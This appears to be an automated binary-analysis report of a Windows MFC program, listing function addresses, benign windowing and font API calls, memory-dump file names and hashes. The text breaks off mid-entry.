Instruction ID: 9707dd5f96a1da73ca229bddba7d9b942ca00b0d80fadd5cdc71623d479af106
Opcode Fuzzy Hash: 8c2c0e69a813f2879e3bfd9dab83dc79bf1d5f1a884ef7312ea3bd6546a8838d
Instruction Fuzzy Hash: 0C01C471B007109BDB20DF56D54267EF7F4AF90304F90495FE44263642CBF86A08C7A5

Uniqueness

Uniqueness Score: -1.00%

Function 0040222F, Relevance: 10.5, APIs: 7, Instructions: 43COMMON

Download Yara Rule

APIs

#2302.MFC42(?,000003F6,?), ref: 0040E87B
#2302.MFC42(?,000003F2,?,?,000003F6,?), ref: 0040E88D
#2302.MFC42(?,000003F4,?,?,000003F2,?,?,000003F6,?), ref: 0040E89F
#2302.MFC42(?,000003F3,?,?,000003F4,?,?,000003F2,?,?,000003F6,?), ref: 0040E8B1
#2302.MFC42(?,000003F5,?,?,000003F3,?,?,000003F4,?,?,000003F2,?,?,000003F6,?), ref: 0040E8C3
#2302.MFC42(?,000003F1,?,?,000003F5,?,?,000003F3,?,?,000003F4,?,?,000003F2,?,?), ref: 0040E8D5
#2302.MFC42(?,000003F0,?,?,000003F1,?,?,000003F5,?,?,000003F3,?,?,000003F4,?,?), ref: 0040E8E7

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #2302
String ID:
API String ID: 735948377-0
Opcode ID: 54c8e57c050409d7ee838c28da7d17aa8d415d06517f1ca64163f14c906e4949
Instruction ID: 50998a09fc423bc50fa0be01117b3b66080c9966ff00fe1b0ecfe502d3d87b45
Opcode Fuzzy Hash: 54c8e57c050409d7ee838c28da7d17aa8d415d06517f1ca64163f14c906e4949
Instruction Fuzzy Hash: DFF0A935680216BBE312B611FC42EFB67ACDB45B04F85083FBA8595081DF6866116376

Uniqueness

Uniqueness Score: -1.00%

Function 00401E47, Relevance: 10.5, APIs: 7, Instructions: 41COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040E609
#540.MFC42 ref: 0040E617
#3874.MFC42(?), ref: 0040E62C
#535.MFC42(?,?,?), ref: 0040E644
#6199.MFC42(00442180,?,?,?), ref: 0040E65B
#5981.MFC42(?), ref: 0040E662
#800.MFC42(?), ref: 0040E66E

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #3874#535#540#5981#6199#800H_prolog
String ID:
API String ID: 3485101347-0
Opcode ID: c1b22404e4e3e24c5a0b6cdbf7819f7f2c26d5911270dc9944738f5d51f5948f
Instruction ID: 612eb1456ba8db3eaeca1f3faea6e773621e3f730f32c36682c7c9e75759d5d7
Opcode Fuzzy Hash: c1b22404e4e3e24c5a0b6cdbf7819f7f2c26d5911270dc9944738f5d51f5948f
Instruction Fuzzy Hash: 830184B1B102259BCB14EB55D946AFEB7B9FB40318F50091FE012631D1DF782D04C668

Uniqueness

Uniqueness Score: -1.00%

Function 004012C6, Relevance: 10.5, APIs: 7, Instructions: 34COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00421A4B
SystemParametersInfoA.USER32(00000029,00000000), ref: 00421A70
#562.MFC42(00000000), ref: 00421A7B
GetDeviceCaps.GDI32(?,0000005A), ref: 00421A89
CreateFontIndirectA.GDI32(?), ref: 00421A96
#1641.MFC42(00000000), ref: 00421AA3
#816.MFC42(00000000), ref: 00421AAF

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #1641#562#816CapsCreateDeviceFontH_prologIndirectInfoParametersSystem
String ID:
API String ID: 3558114968-0
Opcode ID: be71a65285a98b57062bbf3db4b501cf1da44299973fac06d95fad537bafca1e
Instruction ID: 5f7759fb5e93635991df04c4953d0fec57a53cc45c803ccc676004ddadbccaa8
Opcode Fuzzy Hash: be71a65285a98b57062bbf3db4b501cf1da44299973fac06d95fad537bafca1e
Instruction Fuzzy Hash: F701A472A00624EBDB10EBA0FC4ABEDB734FB14305F5001AAE116A61E0DF781B48CB14

Uniqueness

Uniqueness Score: -1.00%

Function 0040B9EE, Relevance: 10.5, APIs: 7, Instructions: 33COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040B9F3
#616.MFC42 ref: 0040BA12
#795.MFC42 ref: 0040BA21
#656.MFC42 ref: 0040BA30
#793.MFC42 ref: 0040BA3F
#656.MFC42 ref: 0040BA4E
#6515.MFC42 ref: 0040BA5D

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #656$#616#6515#793#795H_prolog
String ID:
API String ID: 4267149903-0
Opcode ID: ec89973aa07d43f9ef93a56f8df42f67c092a7ab970689dbc074a8046b1e439f
Instruction ID: fdc2aa81d35f17302b6e3e4d12129b4657c30330855330a0054c82f653c00983
Opcode Fuzzy Hash: ec89973aa07d43f9ef93a56f8df42f67c092a7ab970689dbc074a8046b1e439f
Instruction Fuzzy Hash: 33017170A056A4DEC715FBA4E1153DDBBA4AF14308F9149CED06663282CBB81708DB65

Uniqueness

Uniqueness Score: -1.00%

Function 0041132F, Relevance: 9.2, APIs: 6, Instructions: 157COMMON

Download Yara Rule

APIs

GetWindowRect.USER32 ref: 00411386
GetWindowRect.USER32 ref: 004113D2
OffsetRect.USER32(?,?,?), ref: 004113EE
#4083.MFC42(0042DEE8), ref: 004113F7
OffsetRect.USER32(?,?,00000000), ref: 0041147F
#4299.MFC42(?,?,?,?,00000001), ref: 0041149B

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$OffsetWindow$#4083#4299
String ID:
API String ID: 2080857532-0
Opcode ID: 0f4533b0c7c320f2cb15c268db7500ce7500ab98a1038e83a0a94d9427827f3a
Instruction ID: 6decf1f17f83ae59ac6d4db5d85e798141b8f7c51c962a44a705d6d0556a56c4
Opcode Fuzzy Hash: 0f4533b0c7c320f2cb15c268db7500ce7500ab98a1038e83a0a94d9427827f3a
Instruction Fuzzy Hash: 69510671A00119EFCF14CFA8D984AEEB7B9FF48714F14816AEA11F7260D734A945CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0041FAC5, Relevance: 9.1, APIs: 6, Instructions: 123COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 0041FAFB
#860.MFC42(?), ref: 0041FB43
#860.MFC42(?), ref: 0041FB74
#860.MFC42(?), ref: 0041FB9C
#860.MFC42(?), ref: 0041FBC0
#860.MFC42(?), ref: 0041FBE4

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #860$ByteCharMultiWide
String ID:
API String ID: 295232093-0
Opcode ID: 278f6a854337dc73850d723324363faf2e9948bd7a71706cbc5807541d8f30c2
Instruction ID: ba3f35de538b9d5b94845add5d75e84006ce17196ff6c3d9a4c8dff26dfe3aa9
Opcode Fuzzy Hash: 278f6a854337dc73850d723324363faf2e9948bd7a71706cbc5807541d8f30c2
Instruction Fuzzy Hash: DD411C70600615AFDB20DF66CC84ED7B3B8EF89708F00499DA54ADB161DB74F98ACB64

Uniqueness

Uniqueness Score: -1.00%

Function 0041ED24, Relevance: 9.1, APIs: 6, Instructions: 81COMMON

Download Yara Rule

APIs

#4297.MFC42(?,00000000,?), ref: 0041ED78
#4133.MFC42(?,?,?,00000000,?), ref: 0041ED83
#4297.MFC42(?,00000000,?,?,?,?,00000000,?), ref: 0041ED97
#4133.MFC42(?,?,?,00000000,?,?,?,?,00000000,?), ref: 0041EDA2
#4297.MFC42(?,00000000,?,?,?,?,00000000,?,?,?,?,00000000,?), ref: 0041EDB6
#4133.MFC42(?,?,?,00000000,?,?,?,?,00000000,?,?,?,?,00000000,?), ref: 0041EDC1

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #4133#4297
String ID:
API String ID: 247593789-0
Opcode ID: fe6ab3e86c19a8380f0670b9182eec14128832daabcaf56f6b486111c8d58202
Instruction ID: fdd98848737c88ee0cebf8c83718de0bb31d6e32481befadef271fe9ce49659c
Opcode Fuzzy Hash: fe6ab3e86c19a8380f0670b9182eec14128832daabcaf56f6b486111c8d58202
Instruction Fuzzy Hash: 3D21A731700115AFCF14DF55C895E9EBBB9FF88704F01005EF905AB292CAB0E905CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0041EDE4, Relevance: 9.1, APIs: 6, Instructions: 81windowCOMMON

Download Yara Rule

APIs

#6696.MFC42 ref: 0041EDF4
SendMessageA.USER32 ref: 0041EE0D
#6720.MFC42(?,00000000), ref: 0041EE25
SendMessageA.USER32 ref: 0041EE74
#4297.MFC42(?,00000000,?,?,00000000), ref: 0041EEB9
#4133.MFC42(?,?,?,00000000,?,?,00000000), ref: 0041EEC5

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$#4133#4297#6696#6720
String ID:
API String ID: 2497236823-0
Opcode ID: 3055f35b4110b4577dac37cb9db32195d9b335af4169df592551f23ddfbf3099
Instruction ID: 4c841b8b7611fb65b0d943239eb474b9cb17b0a0f92342e58e07da4d96071e6e
Opcode Fuzzy Hash: 3055f35b4110b4577dac37cb9db32195d9b335af4169df592551f23ddfbf3099
Instruction Fuzzy Hash: A8310675E00219AFCB50DFA5C881EEEB7B9FF48314F10456AE506E7250EB74AA44CF94

Uniqueness

Uniqueness Score: -1.00%

Function 004014D3, Relevance: 9.1, APIs: 6, Instructions: 80windowCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040ABF9
SendMessageA.USER32 ref: 0040AC15
#3293.MFC42(00000000,?,?,00000000), ref: 0040AC4E
ScreenToClient.USER32 ref: 0040AC66
PtInRect.USER32(?,?,?), ref: 0040AC76
#6270.MFC42(00000002,?,?,00000000,00000000,00000000,0000008A,00000087), ref: 0040ACBF

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #3293#6270ClientH_prologMessageRectScreenSend
String ID:
API String ID: 3149471435-0
Opcode ID: 5f67e09e18f4356f469c4d1751db093f193f34794ea07f94dd2cbcc2bd7ed344
Instruction ID: 5a8bc6d03af3f62891e9d1f2dec41c92cebb6e5eec7f1b460f59778097029ece
Opcode Fuzzy Hash: 5f67e09e18f4356f469c4d1751db093f193f34794ea07f94dd2cbcc2bd7ed344
Instruction Fuzzy Hash: BC216171A002099BCB20EFA1CC86EEEBB79AB48304F50443FB111B31D1DB345904DB65

Uniqueness

Uniqueness Score: -1.00%

Function 00401703, Relevance: 9.1, APIs: 6, Instructions: 69COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00416198
#2408.MFC42 ref: 004161C5
#823.MFC42(00000008), ref: 004161CE
#384.MFC42 ref: 004161E1
#2096.MFC42(00000001,00000002,00000001), ref: 00416206
#2408.MFC42(00000001,00000002,00000001), ref: 0041622E

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #2408$#2096#384#823H_prolog
String ID:
API String ID: 303503419-0
Opcode ID: f4ca25dfec6af561e6642688bfe81fb71fc60953fe784e06ae69e8abfd7ea63e
Instruction ID: eacd625b12e5354ad8618697d9eb0043fe24ab968e75b139f950bd97322ff056
Opcode Fuzzy Hash: f4ca25dfec6af561e6642688bfe81fb71fc60953fe784e06ae69e8abfd7ea63e
Instruction Fuzzy Hash: 32210E31300700AFC764AF96D941B9BB7B1BF44754F51442FB9469B691CF79E840CB18

Uniqueness

Uniqueness Score: -1.00%

Function 0041849C, Relevance: 9.1, APIs: 6, Instructions: 62COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 004184A1
#384.MFC42 ref: 004184B9
#2096.MFC42(000000FF,00000001,00000001), ref: 004184D9
GetSysColor.USER32(0000000F), ref: 004184EA
ImageList_AddMasked.COMCTL32(?,?,00000000), ref: 004184F7
#686.MFC42(?,?,?,?,?,00000000), ref: 0041851E

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #2096#384#686ColorH_prologImageList_Masked
String ID:
API String ID: 1512221878-0
Opcode ID: 9e1879a49e85bffdacf4cae1b113e5ec98be88a41fbbcab445adede0be4eec1d
Instruction ID: f502fb21fc9c93283f38f2a808fab5ccac6a285d71e152e6c0545792cd2d23dc
Opcode Fuzzy Hash: 9e1879a49e85bffdacf4cae1b113e5ec98be88a41fbbcab445adede0be4eec1d
Instruction Fuzzy Hash: BA11AC7660011AFFCF119F91DE85EAEBB36FB08358F00402EF605661A0CB759E61EB24

Uniqueness

Uniqueness Score: -1.00%

Function 004018BB, Relevance: 9.1, APIs: 6, Instructions: 61COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00422F2E
#540.MFC42 ref: 00422F41
#540.MFC42 ref: 00422F4D

Part of subcall function 004010D7: #823.MFC42(0000000C), ref: 00425215

#4045.MFC42(0042F1E0), ref: 00422F91
#4045.MFC42(0042F1E0), ref: 00422FAB
#860.MFC42(?,0042F1E0), ref: 00422FC0

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #4045#540$#823#860H_prolog
String ID:
API String ID: 689824428-0
Opcode ID: f9e0e2e912e35935fb83c2ecd6daf00ef2bebd6404cfca3d337becbe094c58d8
Instruction ID: d5d6b06434f63105cb0cf49d8ac03e658201a9b6818dfd4badafc5a0f4bb0ab3
Opcode Fuzzy Hash: f9e0e2e912e35935fb83c2ecd6daf00ef2bebd6404cfca3d337becbe094c58d8
Instruction Fuzzy Hash: 4221A1B1700755ABCB10DF25D64176AF7F1AF44318F51842FE85297781CBB8E904DB64

Uniqueness

Uniqueness Score: -1.00%

Function 004182C5, Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 004182CA
#384.MFC42 ref: 004182E2
#2096.MFC42(000000FF,00000001,00000001), ref: 00418302
GetSysColor.USER32(0000000F), ref: 00418313
ImageList_AddMasked.COMCTL32(?,?,00000000), ref: 00418320
#686.MFC42(?,?,?,?,00000000), ref: 00418344

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #2096#384#686ColorH_prologImageList_Masked
String ID:
API String ID: 1512221878-0
Opcode ID: dec6006652522906cc1ae7c27ed2c02f13ec90616e6378cdaa42e69903113500
Instruction ID: e6eaa06e397fe8dc966d93e6a05a9b87fffa7749360d4d205c2bb3366922cf4c
Opcode Fuzzy Hash: dec6006652522906cc1ae7c27ed2c02f13ec90616e6378cdaa42e69903113500
Instruction Fuzzy Hash: 9211DD76A00119FFCF119F91DD85EEEBB76FB08754F40402EBA16621A1CB369D50EB24

Uniqueness

Uniqueness Score: -1.00%

Function 0041512C, Relevance: 9.1, APIs: 6, Instructions: 58COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00415131
#384.MFC42 ref: 00415149
#2096.MFC42(000000FF,00000001,00000001), ref: 00415169
GetSysColor.USER32(0000000F), ref: 0041517A
ImageList_AddMasked.COMCTL32(?,?,00000000), ref: 00415187
#686.MFC42(?,?,?,00000000), ref: 004151A8

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
